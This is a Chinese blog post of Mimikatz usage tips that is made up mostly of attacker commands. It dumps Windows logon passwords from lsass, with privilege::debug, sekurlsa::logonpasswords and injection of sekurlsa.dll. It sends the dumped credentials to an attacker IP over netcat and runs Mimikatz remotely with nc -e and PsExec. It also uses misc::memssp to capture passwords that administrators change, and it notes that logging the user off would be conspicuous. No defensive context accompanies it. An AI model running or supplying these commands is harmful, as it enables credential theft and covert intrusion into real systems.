mimakatz用法_Mimikatz 使用小技巧

本文介绍了Mimikatz的多种使用方法,包括记录输出、导入本地文件、传输到远程机器、远程执行等。还针对管理员改密码后Mimikatz抓取老密码的问题,给出了使用misc::memssp、直接logoff等解决办法,同时提及了本机和远程终端的操作命令。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

1.记录 Mimikatz输出:

C:>mimikatz.exe ""privilege::debug"" ""log sekurlsa::logonpasswords full"" exit && dir

2.将输出导入到本地文件:

C:>mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit >> log.txt

3.将输出传输到远程机器:

Attacker执行:

E:>nc -lvp 4444

Victim执行:

C:>mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit | nc.exe -vv 192.168.52.1 4444

192.168.52.1 为Attacker IP

4.通过nc远程执行Mimikatz:

Victim执行:

C:>nc -lvp 443

Attacker执行:

E:>nc.exe -vv 192.168.52.128 443 -e mimikatz.exe

192.168.52.128 为Victim IP

若管理员有每过几天就改密码的习惯,但是mimikatz抓取到的密码都是老密码

用QuarksPwDump等抓的hash也是老hash,新密码却抓不到的情况下

可以使用以下方法尝试解决

misc::memssp

记录的结果在c:\windows\system32\mimilsa.log

每次验证都会记录 如 锁屏 等 重启失效

出现如上问题是因为管理一直没注销过,都是直接断开连接,lsass进程里面还吃存放的老的。

也可以直接logoff,但是这样会很明显。

文件

mimikatz.exe、sekurlsa.dll、PsExec.exe(3389)

本机终端

privilege::debug inject::process lsass.exe "绝对路径\sekurlsa.dll" @getLogonPasswords exit

绝对路径\mimikatz.exe < 绝对路径\c.txt > 绝对路径\userpass.txt

———-c.txt———-

privilege::debug inject::process lsass.exe "绝对路径\sekurlsa.dll" @getLogonPasswords exit

————————-

远程终端

psexec.exe -s cmd.exe

绝对路径\mimikatz.exe

privilege::debug inject::process lsass.exe "绝对路径\sekurlsa.dll" @getLogonPasswords exit

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值